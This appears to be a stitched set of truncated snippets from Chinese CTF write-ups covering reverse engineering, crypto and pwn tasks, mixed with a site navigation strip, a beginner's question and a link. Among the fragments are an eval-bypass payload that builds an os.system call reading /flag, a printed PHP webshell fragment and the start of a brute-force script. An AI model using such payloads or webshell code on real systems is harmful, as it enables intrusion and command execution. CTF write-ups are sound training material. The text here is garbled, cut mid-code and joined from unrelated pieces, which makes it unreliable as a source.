address,buffer,memInfo.RegionSize,&bytesRead)){for(size_ti=0;i<bytesRead;i++){if(strnicmp((char*)(buffer+i),target,strlen(target))==0){printf("找到 '%s' 字符串的内存地址: 0x%llx\n",target,(longlong)(address+i));printf("内容: %s\n",buffer+i);}}}free(buffer);}address...
flag{this_Is_a_EaSyRe} reverse1 ida打开看看 shift+f12查看字符串 看到flag的字符串,双击进去看看 发现在数据段上,调用的函数是sub_1400118C0,再双击函数进去看看,发现是汇编代码,反汇编一下,得到函数的代码 __int64sub_1400118C0(){char*v0;// rdi__int64 i;// rcxsize_tv2;// raxsize_tv3;// ...
https://github.com/edwardz246003/danger-of-using-homomorphic-encryption Reverse parser 解题思路 程序将输入加上换行符后进行分组,分为"{}_+\n"及头"De1CTF"和被前面符号分隔的数字字母类共7类,接着进行分组检查并加密 。检查分组部分及加密中的有关条件要求有 flag格式:De1CTF{xxxx[_\+]xxxx[_\+]....
c++,想要入门ctf却无从下手,完全不知道从哪里开始。 听老师说什么web、pwn、reverse方向的,很懵。
尝试报错 得到信息,这是一个 python 脚本,并且有 eval 函数 直接使用全角英文和 chr() 字符拼接(或八进制)即可绕过 payload: __import__(chr(111)+chr(115)).system(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)) ...
reverse-base64decode得到 @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='key'; ...
# step2 get c_listdefstate_reverse(state,key):key=long_to_bytes(key)handle=AES.new(key,AES.MODE_CBC,"\x00"*16)output=handle.decrypt(long_to_bytes(state))returnbytes_to_long(output)random_list=open('p_random_128_hex.txt','r').read().strip().split('\n')random_list=[int(op.str...
政府 CNCERTCNNVD 会员体系(甲方)会员体系(厂商)产品名录企业空间 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8
reverse easyRE 这题是python逆向,做python逆向的方法我感觉挺固定的,就是pyinstxtractor解包一下,再把里面的pyc转成py就可以了 今年年初的时候还对python逆向做了些整理呢,可以看看我博客的(用的是githubpage而且没有弄国内访问加速,所以访问的慢应该是很正常的啦) ...
Reverse shell 程序需要在ubuntu21.10运行,是魔改的upx壳,而且还是带反调试的,直接脱壳太麻烦。 但通过输入ISG,发现加密后的前三位与题目给的文档前三位一样,所以猜测当前n位输入正确时,结果的前n位会与题目给的一样。所以写脚本爆破: from pwn import * context.log_level = 'debug' import json target=[...